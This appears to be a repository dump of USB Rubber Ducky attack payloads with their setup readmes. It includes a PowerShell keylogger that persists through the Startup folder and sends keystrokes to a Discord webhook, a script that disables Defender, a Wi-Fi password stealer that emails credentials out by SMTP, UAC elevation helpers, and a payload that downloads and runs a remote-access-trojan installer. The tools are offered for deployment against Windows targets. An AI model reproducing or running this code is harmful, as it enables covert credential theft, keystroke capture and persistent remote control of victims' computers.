| 13 | REM STAGE2 14 | REM attempts to disable defender 15 | STRING Set-MpPreference -DisableRealtimeMonitoring $true; 
16 | 17 | REM STAGE 3 18 | REM move files to appropiate directories 19 | REM change 'L' to the name of your ducky 20 | STRING $u=gwmi Win32_Volume|?{$_.Label -eq'L'}|select name;cd $u.name;cp .\p.ps1 $env:temp;cp .\l.ps1 $env:temp;cp .\c.cmd "C:/Users/$env:UserName/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup";cd $env:temp;echo "">"$env:UserName.log"; 21 | ENTER 22 | DELAY 200 23 | 24 | REM comment out the option you decide NOT to use 25 | 26 | REM STAGE 4 27 | REM run keylogger 28 | STRING cd "C:/Users/$env:UserName/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup";.\c.cmd;exit 29 | 30 | REM STAGE 5 31 | REM deploy 32 | ENTER 33 | -------------------------------------------------------------------------------- /rubberducky/DucKeyhook/LICENSE: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License [MODIFIED] 2 | 3 | Copyright (c) 2020, Cosmodium CyberSecurity 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | * Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | * Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | * Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | 31 | The above copyright notice and this permission notice shall be included in all 32 | copies or substantial portions of the Software. -------------------------------------------------------------------------------- /rubberducky/DucKeyhook/c.cmd: -------------------------------------------------------------------------------- 1 | @echo off 2 | PowerShell.exe -ExecutionPolicy Bypass -windowstyle hidden -File "%TEMP%\p.ps1" 3 | PowerShell.exe -ExecutionPolicy Bypass -windowstyle hidden -File "%TEMP%\l.ps1" 4 | -------------------------------------------------------------------------------- /rubberducky/DucKeyhook/l.ps1: -------------------------------------------------------------------------------- 1 | # powershell log scheduler 2 | # created by : C0SM0 3 | 4 | for(;;) { 5 | try { 6 | # invoke the worker script 7 | $proc = Get-Content "$env:temp/DdBPKCytRe" 8 | Stop-process -id $proc -Force 9 | powershell Start-Process powershell.exe -windowstyle hidden "$env:temp/p.ps1" 10 | } 11 | catch { 12 | # do something with $_, log it, more likely 13 | } 14 | 15 | # wait for a minute 16 | Start-Sleep 60 17 | } 18 | 19 | # sort the times in chronological order 20 | -------------------------------------------------------------------------------- /rubberducky/DucKeyhook/p.ps1: -------------------------------------------------------------------------------- 1 | # powershell keylogger 2 | # created by : C0SM0 3 | 4 | # webhook, CHANGE ME 
5 | $webhook = "DISCORDWEBHOOK" 6 | 7 | # write pid 8 | $PID > "$env:temp/DdBPKCytRe" 9 | 10 | # keylogger 11 | function KeyLogger($logFile="$env:temp/$env:UserName.log") { 12 | 13 | # webhook process 14 | $logs = Get-Content "$logFile" | Out-String 15 | $Body = @{ 16 | 'username' = $env:UserName 17 | 'content' = $logs 18 | } 19 | Invoke-RestMethod -Uri $webhook -Method 'post' -Body $Body 20 | 21 | # generate log file 22 | $generateLog = New-Item -Path $logFile -ItemType File -Force 23 | 24 | # API signatures 25 | $APIsignatures = @' 26 | [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] 27 | public static extern short GetAsyncKeyState(int virtualKeyCode); 28 | [DllImport("user32.dll", CharSet=CharSet.Auto)] 29 | public static extern int GetKeyboardState(byte[] keystate); 30 | [DllImport("user32.dll", CharSet=CharSet.Auto)] 31 | public static extern int MapVirtualKey(uint uCode, int uMapType); 32 | [DllImport("user32.dll", CharSet=CharSet.Auto)] 33 | public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags); 34 | '@ 35 | 36 | # set up API 37 | $API = Add-Type -MemberDefinition $APIsignatures -Name 'Win32' -Namespace API -PassThru 38 | 39 | # attempt to log keystrokes 40 | try { 41 | while ($true) { 42 | Start-Sleep -Milliseconds 40 43 | 44 | for ($ascii = 9; $ascii -le 254; $ascii++) { 45 | 46 | # use API to get key state 47 | $keystate = $API::GetAsyncKeyState($ascii) 48 | 49 | # use API to detect keystroke 50 | if ($keystate -eq -32767) { 51 | $null = [console]::CapsLock 52 | 53 | # map virtual key 54 | $mapKey = $API::MapVirtualKey($ascii, 3) 55 | 56 | # create a stringbuilder 57 | $keyboardState = New-Object Byte[] 256 58 | $hideKeyboardState = $API::GetKeyboardState($keyboardState) 59 | $loggedchar = New-Object -TypeName System.Text.StringBuilder 60 | 61 | # translate virtual key 62 | if ($API::ToUnicode($ascii, $mapKey, $keyboardState, $loggedchar, 
$loggedchar.Capacity, 0)) { 63 | # add logged key to file 64 | [System.IO.File]::AppendAllText($logFile, $loggedchar, [System.Text.Encoding]::Unicode) 65 | } 66 | } 67 | } 68 | } 69 | } 70 | 71 | # send logs if code fails 72 | finally { 73 | # send logs via webhook 74 | Invoke-RestMethod -Uri $webhook -Method 'post' -Body $Body 75 | } 76 | } 77 | 78 | # run keylogger 79 | KeyLogger -------------------------------------------------------------------------------- /rubberducky/DucKeyhook/payload.txt: -------------------------------------------------------------------------------- 1 | REM Powershell Keylogger for the USB RubberDucky 2 | REM created by : C0SM0 3 | 4 | REM STAGE1 5 | REM open runbox 6 | DELAY 1000 7 | GUI r 8 | DELAY 200 9 | STRING powershell 10 | ENTER 11 | DELAY 300 12 | 13 | REM STAGE 3 14 | REM move files to appropiate directories 15 | REM change 'L' to the name of your ducky 16 | STRING $u=gwmi Win32_Volume|?{$_.Label -eq'L'}|select name;cd $u.name;cp .\p.ps1 $env:temp;cp .\l.ps1 $env:temp;cp .\c.cmd "C:/Users/$env:UserName/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup";cd $env:temp;echo "">"$env:UserName.log"; 17 | ENTER 18 | DELAY 200 19 | 20 | REM STAGE 4 21 | REM run keylogger 22 | STRING cd "C:/Users/$env:UserName/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup";.\c.cmd;exit 23 | 24 | REM STAGE 5 25 | REM deploy 26 | ENTER 27 | -------------------------------------------------------------------------------- /rubberducky/DucKeyhook/uninstaller.cmd: -------------------------------------------------------------------------------- 1 | cd C:/Users/%USERNAME%/AppData/Roaming/Microsoft/Windows && cd "Start Menu" && cd Programs/Startup 2 | del c.cmd 3 | cd %TEMP% 4 | del l.ps1 5 | del p.ps1 6 | del DdBPKCytRe 7 | del %USERNAME%.log 8 | taskkill /im powershell.exe /f 9 | -------------------------------------------------------------------------------- /rubberducky/DuckMinistrator/LICENSE: 
-------------------------------------------------------------------------------- 1 | BSD 3-Clause License [MODIFIED] 2 | 3 | Copyright (c) 2020, Cosmodium CyberSecurity 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | * Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | * Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | * Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | 31 | The above copyright notice and this permission notice shall be included in all 32 | copies or substantial portions of the Software. 
-------------------------------------------------------------------------------- /rubberducky/DuckMinistrator/README.md: -------------------------------------------------------------------------------- 1 | # DuckMinistrator 2 | > Blue Cosmo 3 | 4 | ## Requirements 5 | - rubber ducky flashed with twinduck 6 | - micro sd card labled "D" 7 | - Windows 10 target 8 | 9 | ## Overview 10 | ``` 11 | gets an administrative powershell using a 'c.cmd' script 12 | ``` 13 | 14 | ## Install 15 | ```bash 16 | svn checkout https://github.com/CosmodiumCS/MalwareDNA/trunk/bashbunny/DuckMinistrator 17 | ``` 18 | 19 | ## Setup 20 | 1. Name micro sd card "D" 21 | 2. Flash twinduck on to ducky 22 | 3. add whatever you want to run in the powershell to the bottom of 'payload.txt' 23 | 4. load, encode, and deploy! 24 | -------------------------------------------------------------------------------- /rubberducky/DuckMinistrator/c.cmd: -------------------------------------------------------------------------------- 1 | REM get admin permissions for script 2 | @echo off 3 | :: BatchGotAdmin 4 | :------------------------------------- 5 | REM --> check for permissions 6 | IF "%PROCESSOR_ARCHITECTURE%" EQU "amd64" ( 7 | >nul 2>&1 "%SYSTEMROOT%\SysWOW64\cacls.exe" "%SYSTEMROOT%\SysWOW64\config\system" 8 | ) ELSE ( 9 | >nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system" 10 | ) 11 | 12 | REM --> if error flag set, we do not have admin. 13 | if '%errorlevel%' NEQ '0' ( 14 | echo Requesting administrative privileges... 
15 | goto UACPrompt 16 | ) else ( goto gotAdmin ) 17 | 18 | :UACPrompt 19 | echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs" 20 | set params= %* 21 | echo UAC.ShellExecute "cmd.exe", "/c ""%~s0"" %params:"=""%", "", "runas", 1 >> "%temp%\getadmin.vbs" 22 | 23 | "%temp%\getadmin.vbs" 24 | del "%temp%\getadmin.vbs" 25 | exit /B 26 | 27 | :gotAdmin 28 | pushd "%CD%" 29 | CD /D "%~dp0" 30 | 31 | REM you can remove the 'powershell' to get an admin CMD 32 | start powershell 33 | -------------------------------------------------------------------------------- /rubberducky/DuckMinistrator/inject.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/rubberducky/DuckMinistrator/inject.bin -------------------------------------------------------------------------------- /rubberducky/DuckMinistrator/payload.txt: -------------------------------------------------------------------------------- 1 | REM Get Admin CMD/Powershell 2 | REM Created By : C0SM0 3 | 4 | REM open powershell 5 | DELAY 1000 6 | GUI r 7 | DELAY 200 8 | STRING powershell /c $u=gwmi Win32_Volume|?{$_.Label -eq'D'}|select name;cd $u.name;./c.cmd 9 | ENTER 10 | DELAY 2000 11 | 12 | REM accept administrative permissions 13 | ALT y 14 | DELAY 1000 15 | 16 | REM run whatever you want to run on an administrative powershell 17 | -------------------------------------------------------------------------------- /rubberducky/OnlyDuck/README.md: -------------------------------------------------------------------------------- 1 | ## onlyduck.txt 2 | This is an installer for OnlyRAT that uses the [USB Rubber Ducky](https://shop.hak5.org/products/usb-rubber-ducky-deluxe). 3 | 4 | ## Download: 5 | ```bash 6 | svn checkout https://github.com/CosmodiumCS/MalwareDNA/trunk/rubberducky/OnlyDuck 7 | ``` 8 | 9 | ## Instructions: 10 | 1. 
In line 18, replace `DISCORDWEBHOOK` with your discord webhook 11 | ``` 12 | STRING echo DISCORDWEBHOOK > lawFvVTikZ.txt 13 | ``` 14 | 2. Load, Encode, and Deploy 15 | -------------------------------------------------------------------------------- /rubberducky/OnlyDuck/onlyduck.txt: -------------------------------------------------------------------------------- 1 | REM OnlyRAT installer via the USB Rubber Ducky 2 | REM Created by : C0SM0 3 | 4 | REM open the command linve via the runbox 5 | DELAY 1000 6 | GUI r 7 | DELAY 400 8 | STRING cmd 9 | ENTER 10 | 11 | REM execute discord webhook installer 12 | DELAY 800 13 | STRING set "YKHfpmMRoQ=C:/Users/%username%/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup" 14 | ENTER 15 | STRING cd %YKHfpmMRoQ% 16 | ENTER 17 | REM replace "DISCORDWEBHOOK" with your Discord Webhook 18 | STRING echo DISCORDWEBHOOK > lawFvVTikZ.txt 19 | ENTER 20 | STRING powershell powershell.exe -windowstyle hidden "Invoke-WebRequest -Uri raw.githubusercontent.com/CosmodiumCS/OnlyRAT/main/payloads/dw1.cmd -OutFile wEaoFkNduy.cmd" 21 | ENTER 22 | DELAY 200 23 | STRING powershell ./wEaoFkNduy.cmd && exit 24 | ENTER 25 | 26 | REM UAC bypass 27 | DELAY 1800 28 | ALT y -------------------------------------------------------------------------------- /rubberducky/duckfi/README.md: -------------------------------------------------------------------------------- 1 | create wifi hotspots with usb rubber ducky 2 | 3 | ## Download: 4 | ```bash 5 | svn checkout https://github.com/CosmodiumCS/MalwareDNA/trunk/rubberducky/duckfi 6 | ``` 7 | -------------------------------------------------------------------------------- /rubberducky/duckfi/c.cmd: -------------------------------------------------------------------------------- 1 | REM get admin permissions for script 2 | @echo off 3 | :: BatchGotAdmin 4 | :------------------------------------- 5 | REM --> check for permissions 6 | IF "%PROCESSOR_ARCHITECTURE%" EQU "amd64" ( 7 | >nul 2>&1 
"%SYSTEMROOT%\SysWOW64\cacls.exe" "%SYSTEMROOT%\SysWOW64\config\system" 8 | ) ELSE ( 9 | >nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system" 10 | ) 11 | 12 | REM --> if error flag set, we do not have admin. 13 | if '%errorlevel%' NEQ '0' ( 14 | echo Requesting administrative privileges... 15 | goto UACPrompt 16 | ) else ( goto gotAdmin ) 17 | 18 | :UACPrompt 19 | echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs" 20 | set params= %* 21 | echo UAC.ShellExecute "cmd.exe", "/c ""%~s0"" %params:"=""%", "", "runas", 1 >> "%temp%\getadmin.vbs" 22 | 23 | "%temp%\getadmin.vbs" 24 | del "%temp%\getadmin.vbs" 25 | exit /B 26 | 27 | :gotAdmin 28 | pushd "%CD%" 29 | CD /D "%~dp0" 30 | 31 | REM you can remove the 'powershell' to get an admin CMD 32 | sc config Wlansvc start= demand 33 | sc start Wlansvc 34 | netsh wlan set hostednetwork mode=allow ssid=cosmo key=subscribe keyUsage=persistent && netsh wlan start cosmo;exit -------------------------------------------------------------------------------- /rubberducky/duckfi/payload.txt: -------------------------------------------------------------------------------- 1 | REM DuckFi, activate Windows Wifi Hotspots for 'Free Wifi' 2 | REM Created by : C0SM0 3 | 4 | REM Stage 1, get administrative powershell 5 | DELAY 1000 6 | GUI r 7 | DELAY 200 8 | STRING powershell /c $u=gwmi Win32_Volume|?{$_.Label -eq'D'}|select name;cd $u.name;./c.cmd 9 | ENTER 10 | 11 | REM Stage2, accept administrative permissions 12 | DELAY 2000 13 | ALT y 14 | DELAY 1500 15 | 16 | --- 17 | 18 | REM Stage 3, create hotspot 19 | STRING netsh wlan set hostednetwork mode=allow ssid=cosmo key=subscribe keyUsage=persistent;netsh wlan start cosmo;exit 20 | ENTER 21 | 22 | “Create Wifi Hotspot” 23 | 24 | type: netsh wlan set hostednetwork mode=allow ssid=hotspotname key=hotspotpassword 25 | 26 | *password has minimum of 8 characters 27 | 28 | *hotspotname can be changed to ideal name 29 | 30 | *hotspotpassword 
can be changed to ideal password 31 | 32 | to start/activate: 33 | 34 | type: netsh wlan start hotspotname 35 | 36 | *hotspotname needs to be the same as before 37 | 38 | to stop/deactivate: 39 | 40 | type: netsh wlan stop hotspotname 41 | 42 | *hotspotname needs to be the same as before -------------------------------------------------------------------------------- /rubberducky/ducky-flasher/README.md: -------------------------------------------------------------------------------- 1 | # Ducky-Flasher 2 | > Easily flash your USB Rubber ducky from Hak5! 3 | 4 | - [video](https://www.youtube.com/watch?v=BzYH-BPHLpE) 5 | 6 | # Firmwares included: 7 | 1. duck.hex v2 (Duck(Original)) 8 | 2. usb.hex v2 (FAT Duck) 9 | 3. m_duck.hex v2 (Detour Duck(formerly Naked Duck)) 10 | 4. c_duck.hex v2 (Twin Duck) 11 | 5. Twin Duck Versions (Original, Special 1, Special 2) 12 | 13 | # To read more about the firmware go here 14 | - https://code.google.com/p/ducky-decode/wiki/Which_Firmware 15 | 16 | # To install ducky-flasher run sudo python setup.py 17 | You must have dfu-programmer installed (sudo apt-get install dfu-programmer) 18 | 19 | # To start ducky-flasher type ducky-flasher in your terminal emulator 20 | 21 | # Uninstalling 22 | To uninstall ducky-flasher run sudo python uninstall.py 23 | -------------------------------------------------------------------------------- /rubberducky/ducky-flasher/readme.txt: -------------------------------------------------------------------------------- 1 | Ducky-Flasher 2 | Easily flash your USB Rubber ducky from Hak5! 3 | 4 | #Firmwares included: 5 | 1. duck.hex v2 (Duck(Original)) 6 | 2. usb.hex v2 (FAT Duck) 7 | 3. m_duck.hex v2 (Detour Duck(formerly Naked Duck)) 8 | 4. c_duck.hex v2 (Twin Duck) 9 | 5. 
Twin Duck Versions (Original, Special 1, Special 2) 10 | #To read more about the firmware go here 11 | https://code.google.com/p/ducky-decode/wiki/Which_Firmware 12 | 13 | #To install ducky-flasher run sudo python setup.py 14 | You must have dfu-programmer installed (sudo apt-get install dfu-programmer) 15 | 16 | #To start ducky-flasher type ducky-flasher in your terminal emulator 17 | 18 | #Uninstalling 19 | 20 | To uninstall ducky-flasher run sudo python uninstall.py 21 | -------------------------------------------------------------------------------- /rubberducky/ducky-flasher/setup.py: -------------------------------------------------------------------------------- 1 | #Make ducky-flasher a default command 2 | 3 | import os 4 | 5 | permission = os.system("sudo chmod 777 ducky-flasher") 6 | 7 | if permission == 0: 8 | move = os.system("sudo cp ducky-flasher /usr/bin; sudo cp -r Firmware /usr/bin") 9 | if move == 0: 10 | print "ducky-flasher is setup!" 11 | print "To use it, type sudo ducky-flasher" 12 | else: 13 | print "Make sure you ran setup.py with sudo" 14 | 15 | else: 16 | print "Make sure you ran setup.py with sudo" 17 | -------------------------------------------------------------------------------- /rubberducky/ducky-flasher/uninstall.py: -------------------------------------------------------------------------------- 1 | #Uninstall ducky-flasher 2 | import os 3 | os.system("clear") 4 | print "Are you sure you want to uninstall ducky-flahser?" 5 | print "1 = yes" 6 | print "2 = no" 7 | question = int(raw_input("Choice: ")) 8 | 9 | if question == 1: 10 | os.system("clear") 11 | print "Uninstalling..." 
12 | status = os.system("sudo rm /usr/bin/ducky-flasher; rm -r /usr/bin/Firmware") 13 | if status == 0: 14 | os.system("clear") 15 | print "ducky-flasher has been uninstalled :(" 16 | else: 17 | print "make sure your running as root" 18 | else: 19 | os.system("clear") 20 | print "OK, Awesome :P" 21 | -------------------------------------------------------------------------------- /rubberducky/duckylan-smtp/LICENSE: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License [MODIFIED] 2 | 3 | Copyright (c) 2020, Cosmodium CyberSecurity 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | * Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | * Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | * Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | 31 | The above copyright notice and this permission notice shall be included in all 32 | copies or substantial portions of the Software. -------------------------------------------------------------------------------- /rubberducky/duckylan-smtp/README.md: -------------------------------------------------------------------------------- 1 | # DuckyLan SMTP 2 | > Blue Cosmo 3 | 4 | --- 5 | 6 | ``` 7 | ________ __ .____ 8 | \______ \ __ __ ____ | | _____.__.| | _____ ____ 9 | | | \| | \_/ ___\| |/ < | || | \__ \ / \ 10 | | ` \ | /\ \___| < \___ || |___ / __ \| | \ 11 | /_______ /____/ \___ >__|_ \/ ____||_______ (____ /___| / 12 | \/ \/ \/\/ \/ \/ \/ 13 | ``` 14 | 15 | ## Overview: 16 | A USB RubberDucky payload that steals Wi-Fi credentials and sends them to the attacker via STMP. 
17 | 18 | ## Resources: 19 | - [YouTube Video]() 20 | - [YouTube Channel](https://youtube.com/cosmodiumcs) 21 | - [Website](https://cosmodiumcs.com) 22 | 23 | ## Requirements: 24 | - [Twin-Duck firmware](https://www.youtube.com/watch?v=BzYH-BPHLpE) 25 | - Gmail account 26 | - i suggest making a separate Gmail account for this payload 27 | - your Gmail must have [LSA Access](https://myaccount.google.com/lesssecureapps?pli=1&rapt=AEjHL4Px2VEFPoFPEuLutMD6UhNVRyY9P3s7l-pCGA53NBqilKVrtltrfS1823x5i6k6_pSEVp6jkEW0zKQT2CHN0WXh4fvGiw) enabled 28 | - Windows 10 Target 29 | 30 | ## Download: 31 | ```bash 32 | svn checkout https://github.com/CosmodiumCS/MalwareDNA/trunk/rubberducky/duckylan-smtp 33 | ``` 34 | 35 | ## Instructions: 36 | Set-Up/Installation 37 | 1. change Gmail credentials in *p.ps1* 38 | ```powershell 39 | # gmail credentials 40 | $email = "example@gmail.com" 41 | $password = "password" 42 | ``` 43 | 2. in line 15 of *payload.txt*, change 'W' to the name of your ducky [SD Card] 44 | ```powershell 45 | STRING $u=gwmi Win32_Volume|?{$_.Label -eq'W'}|select name;cd $u.name;./p.ps1;exit 46 | ``` 47 | 3. flash Twin-Duck firmware on to your duck 48 | - [Tutorial](https://www.youtube.com/watch?v=BzYH-BPHLpE) 49 | 4. load, encode, and deploy!! 50 | 51 | --- 52 | 53 | - hope you enjoy the payload!! 
54 | - please subscribe to my [YouTube channel](https://youtube.com/cosmodiumcs) :) 55 | 56 | #projects #malware 57 | -------------------------------------------------------------------------------- /rubberducky/duckylan-smtp/p.ps1: -------------------------------------------------------------------------------- 1 | # smtp based wifi password stealer 2 | # created by : C0SM0 3 | 4 | # change to your gmail credentials 5 | $email = "example@gmail.com" 6 | $password = "password" 7 | 8 | # exfiltrate wifi creds to file 9 | # file named after username 10 | $creds = (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize | Out-String 11 | 12 | # email creds via smtp 13 | $subject = "$env:UserName wifi passwords" 14 | $smtp = New-Object System.Net.Mail.SmtpClient("smtp.gmail.com", "587"); 15 | $smtp.EnableSSL = $true 16 | $smtp.Credentials = New-Object System.Net.NetworkCredential($email, $password); 17 | $smtp.Send($email, $email, $subject, $creds); 18 | -------------------------------------------------------------------------------- /rubberducky/duckylan-smtp/payload.txt: -------------------------------------------------------------------------------- 1 | REM usb rubber ducky wifi password exfiltrator [smtp] 2 | REM created by : C0SM0 3 | 4 | REM let the computer recognize the twinduck 5 | DELAY 1000 6 | 7 | REM open powershell via runbox 8 | GUI r 9 | DELAY 200 10 | STRING powershell 11 | ENTER 12 | DELAY 300 13 | 14 | REM cd into twinduck labled "W" and run the 'p.ps1' file 15 | STRING $u=gwmi Win32_Volume|?{$_.Label -eq'W'}|select name;cd $u.name;./p.ps1;exit 16 | ENTER 17 | 18 | -------------------------------------------------------------------------------- /rubberducky/encoder/README.md: 
-------------------------------------------------------------------------------- 1 | MaMe82's Python port of infamous hak5 DuckEncoder 2 | 3 | Added in additional commandline parameters to pipe in STDIN. 4 | 5 | -p (--passthru) could be used to pipe in DuckyScript from STDIN. Example 6 | 7 | cat duckyscript.txt | python duckencoder.py -p -l de > inject.bin 8 | 9 | -r (--rawpassthru) could be used to pipe thru raw ASCII to a keyboard device. Example 10 | 11 | 12 | cat text.txt | python duckencoder.py -r -l de > /dev/hidg0 13 | 14 | Usage 15 | 16 | Duckencoder python port 1.0 by MaMe82 17 | ===================================== 18 | 19 | Creds to: hak5Darren for original duckencoder 20 | https://github.com/hak5darren/USB-Rubber-Ducky 21 | 22 | Converts payload created by DuckEncoder to sourcefile for DigiSpark Sketch 23 | 24 | Usage: python duckencoder.py -i [file ..] Encode DuckyScript source given by -i file 25 | or: python duckencoder.py -i [file ..] -o [outfile ..] Encode DuckyScript source to outputfile given by -o 26 | 27 | Arguments: 28 | -i [file ..] Input file in DuckyScript format 29 | -o [file ..] Output File for encoded payload, defaults to inject.bin 30 | -l Keyboard Layout (us/fr/pt/de ...) 
31 | -p, --pastthru Read script from stdin and print result on stdout (ignore -i, -o) 32 | -r, --rawpassthru Like passthru, but input is read as STRING instead of duckyscript 33 | -h Print this help screen 34 | -------------------------------------------------------------------------------- /rubberducky/helloworld/inject.bin: -------------------------------------------------------------------------------- 1 | ,, ,,,,,1 6,1(,,,7,''((,, , ,,, 2 |  ,,,,(,&'''((,,( 3 |  ,(,''((,,(  4 | ,(((,,1 6,1, , ,(,''(  5 | , 6,( -------------------------------------------------------------------------------- /rubberducky/helloworld/payload.txt: -------------------------------------------------------------------------------- 1 | REM payload that opens notepad and types 'Hello, World!' 2 | REM Created by : C0SM0 3 | 4 | REM allocates time for computer to recognize ducky as a keyboard 5 | DELAY 9000 6 | 7 | REM opens runbox 8 | GUI r 9 | DELAY 100 10 | 11 | REM open notepad 12 | STRING notepad 13 | ENTER 14 | 15 | REM type 'Hello, World!' into the notepad 16 | DELAY 200 17 | STRING Hello, World! 
18 | -------------------------------------------------------------------------------- /rubberducky/twinduck-wifipass/inject.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/rubberducky/twinduck-wifipass/inject.bin -------------------------------------------------------------------------------- /rubberducky/twinduck-wifipass/payload.txt: -------------------------------------------------------------------------------- 1 | REM Exfiltrate wifi passwords to usb [or twinduck] 2 | REM Created By : Blue Cosmo 3 | 4 | REM let computer recognize twinduck 5 | DELAY 1000 6 | 7 | REM open powershell via runbox 8 | GUI r 9 | DELAY 200 10 | STRING powershell 11 | ENTER 12 | DELAY 200 13 | 14 | REM cd into drive labeled "W" 15 | STRING $u=gwmi Win32_Volume|?{$_.Label -eq'W'}|select name;cd $u.name 16 | ENTER 17 | DELAY 100 18 | 19 | REM exfiltrate wifi passwords to file 20 | REM file named after computer username 21 | STRING (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize >$env:UserName".txt" 22 | ENTER 23 | DELAY 300 24 | STRING exit 25 | ENTER 26 | -------------------------------------------------------------------------------- /rubberducky/webattack/inject.bin: -------------------------------------------------------------------------------- 